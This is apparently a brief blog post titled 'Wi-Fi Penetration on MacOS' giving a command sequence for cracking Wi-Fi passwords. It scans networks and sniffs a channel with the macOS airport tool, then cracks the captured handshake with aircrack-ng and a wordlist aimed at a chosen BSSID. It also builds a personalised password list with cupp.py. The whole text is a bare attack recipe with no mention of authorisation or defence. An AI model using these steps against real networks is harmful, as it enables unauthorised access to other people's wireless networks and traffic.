Wi-Fi Penetration on MacOS

airport -s
airport en0 sniff CHANNEL
#^c and then get a file *.cap 
aircrack-ng -w dict.txt -b BSSID /tmp/airportSniffLbhZsp.cap
#cupp is a social password generator
python3 cupp.py -I
posted @ 2021-01-14 16:32  miyasaka  阅读(112)  评论(1)    收藏  举报